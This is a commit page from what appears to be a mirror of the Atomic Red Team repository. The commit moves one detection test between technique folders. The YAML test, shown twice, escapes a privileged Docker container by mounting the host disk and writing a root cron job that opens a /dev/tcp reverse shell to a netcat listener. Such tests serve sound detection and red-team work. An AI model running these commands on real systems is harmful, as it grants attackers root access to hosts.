security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge pull request #1998 from clr2of8/no02

Browse Source 
moving atomics to correct T#
This commit is contained in:
Jose Enrique Hernandez
2022-06-15 17:34:47 -04:00
committed by GitHub
parent 1d1ae02aa3 03e37456cd
commit 0d09ff0234
2 changed files with 88 additions and 92 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1611.002/T1611.002.yaml
-92
View File
@@ -1,92 +0,0 @@
attack_technique: T1611.002
display_name: "Escape to Host"
atomic_tests:
- name: Mount host filesystem to escape privileged Docker container
auto_generated_guid: 6c499943-b098-4bc6-8d38-0956fc182984
description: |
This technique abuses privileged Docker containers to mount the host's filesystem and then create a cron job to launch a reverse shell as the host's superuser.
The container running the test needs be privileged. It may take up to a minute for this to run due to how often crond triggers a job.
Dev note: the echo to create cron_filename is broken up to prevent localized execution of hostname and id by Powershell.
supported_platforms:
- containers
input_arguments:
mount_device:
description: Path to the device of the host's disk to mount
type: Path
default: /dev/dm-0
mount_point:
description: Path where the host filesystem will be mounted
type: Path
default: /mnt/T1611.002
cron_path:
description: Path on the host filesystem where cron jobs are stored
type: Path
default: /etc/cron.d
cron_filename:
description: Filename of the cron job in cron_path
type: String
default: T1611_002
listen_address:
description: IP address to listen for callback from the host system.
type: String
default: "`ifconfig eth0 | grep inet | awk '{print $2}'`"
listen_port:
description: TCP Port to listen on for callback from the host system.
type: String
default: 4444
dependency_executor_name: sh
dependencies:
- description: Verify mount is installed.
prereq_command: |
which mount
get_prereq_command: |
if [ "" == "`which mount`" ]; then echo "mount Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install mount ; elif [ -n "`which yum`" ]; then sudo yum -y install mount ; fi ; else echo "mount installed"; fi
- description: Verify container is privileged.
prereq_command: |
capsh --print | grep cap_sys_admin
get_prereq_command: |
if [ "`capsh --print | grep cap_sys_admin`" == "" ]; then echo "Container not privileged. Re-start container in insecure state. Docker: run with --privileged flag. Kubectl, add securityContext: privileged: true"; fi
- description: Verify mount device (/dev/dm-0) exists.
prereq_command: |
ls #{mount_device}
get_prereq_command: |
if [ ! -f #{mount_device} ]; then echo "Container not privileged or wrong device path. Re-start container in insecure state. Docker: run with --privileged flag. Kubectl, add securityContext: privileged: true"; fi
- description: Netcat is installed.
prereq_command: |
which netcat
get_prereq_command: |
if [ "" == "`which netcat`" ]; then echo "netcat Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install netcat ; elif [ -n "`which yum`" ]; then sudo yum -y install netcat ; fi
- description: IP Address is known.
prereq_command: |
if [ "#{listen_address}" != "" ]; then echo "Listen address set as #{listen_address}" ; fi
get_prereq_command: |
if [ "" == "`which ifconfig`" ]; then echo "ifconfig Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install net=tools ; elif [ -n "`which yum`" ]; then sudo yum -y install net-tools ; fi
executor:
name: sh
elevation_required: true
command: |
if [ ! -d #{mount_point} ]; then mkdir #{mount_point} ; mount #{mount_device} #{mount_point}; fi
echo -n "* * * * * root /bin/bash -c '/bin/bash -c echo \"\"; echo \"hello from host! " > #{mount_point}#{cron_path}/#{cron_filename}
echo -n "$" >> #{mount_point}#{cron_path}/#{cron_filename}
echo -n "(hostname) " >> #{mount_point}#{cron_path}/#{cron_filename}
echo -n "$" >> #{mount_point}#{cron_path}/#{cron_filename}
echo "(id)\" >& /dev/tcp/#{listen_address}/#{listen_port} 0>&1'" >> #{mount_point}#{cron_path}/#{cron_filename}
netcat -l -p #{listen_port} 2>&1
cleanup_command: |
rm #{mount_point}#{cron_path}/#{cron_filename}
umount #{mount_point}
rmdir #{mount_point}
atomics/T1611/T1611.yaml
+88
View File
@@ -56,3 +56,91 @@ atomic_tests:
name: sh
cleanup_command: |
kubectl --context kind-atomic-cluster delete pod atomic-escape-pod
- name: Mount host filesystem to escape privileged Docker container
auto_generated_guid: 6c499943-b098-4bc6-8d38-0956fc182984
description: |
This technique abuses privileged Docker containers to mount the host's filesystem and then create a cron job to launch a reverse shell as the host's superuser.
The container running the test needs be privileged. It may take up to a minute for this to run due to how often crond triggers a job.
Dev note: the echo to create cron_filename is broken up to prevent localized execution of hostname and id by Powershell.
supported_platforms:
- containers
input_arguments:
mount_device:
description: Path to the device of the host's disk to mount
type: Path
default: /dev/dm-0
mount_point:
description: Path where the host filesystem will be mounted
type: Path
default: /mnt/T1611.002
cron_path:
description: Path on the host filesystem where cron jobs are stored
type: Path
default: /etc/cron.d
cron_filename:
description: Filename of the cron job in cron_path
type: String
default: T1611_002
listen_address:
description: IP address to listen for callback from the host system.
type: String
default: "`ifconfig eth0 | grep inet | awk '{print $2}'`"
listen_port:
description: TCP Port to listen on for callback from the host system.
type: String
default: 4444
dependency_executor_name: sh
dependencies:
- description: Verify mount is installed.
prereq_command: |
which mount
get_prereq_command: |
if [ "" == "`which mount`" ]; then echo "mount Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install mount ; elif [ -n "`which yum`" ]; then sudo yum -y install mount ; fi ; else echo "mount installed"; fi
- description: Verify container is privileged.
prereq_command: |
capsh --print | grep cap_sys_admin
get_prereq_command: |
if [ "`capsh --print | grep cap_sys_admin`" == "" ]; then echo "Container not privileged. Re-start container in insecure state. Docker: run with --privileged flag. Kubectl, add securityContext: privileged: true"; fi
- description: Verify mount device (/dev/dm-0) exists.
prereq_command: |
ls #{mount_device}
get_prereq_command: |
if [ ! -f #{mount_device} ]; then echo "Container not privileged or wrong device path. Re-start container in insecure state. Docker: run with --privileged flag. Kubectl, add securityContext: privileged: true"; fi
- description: Netcat is installed.
prereq_command: |
which netcat
get_prereq_command: |
if [ "" == "`which netcat`" ]; then echo "netcat Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install netcat ; elif [ -n "`which yum`" ]; then sudo yum -y install netcat ; fi
- description: IP Address is known.
prereq_command: |
if [ "#{listen_address}" != "" ]; then echo "Listen address set as #{listen_address}" ; fi
get_prereq_command: |
if [ "" == "`which ifconfig`" ]; then echo "ifconfig Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install net=tools ; elif [ -n "`which yum`" ]; then sudo yum -y install net-tools ; fi
executor:
name: sh
elevation_required: true
command: |
if [ ! -d #{mount_point} ]; then mkdir #{mount_point} ; mount #{mount_device} #{mount_point}; fi
echo -n "* * * * * root /bin/bash -c '/bin/bash -c echo \"\"; echo \"hello from host! " > #{mount_point}#{cron_path}/#{cron_filename}
echo -n "$" >> #{mount_point}#{cron_path}/#{cron_filename}
echo -n "(hostname) " >> #{mount_point}#{cron_path}/#{cron_filename}
echo -n "$" >> #{mount_point}#{cron_path}/#{cron_filename}
echo "(id)\" >& /dev/tcp/#{listen_address}/#{listen_port} 0>&1'" >> #{mount_point}#{cron_path}/#{cron_filename}
netcat -l -p #{listen_port} 2>&1
cleanup_command: |
rm #{mount_point}#{cron_path}/#{cron_filename}
umount #{mount_point}
rmdir #{mount_point}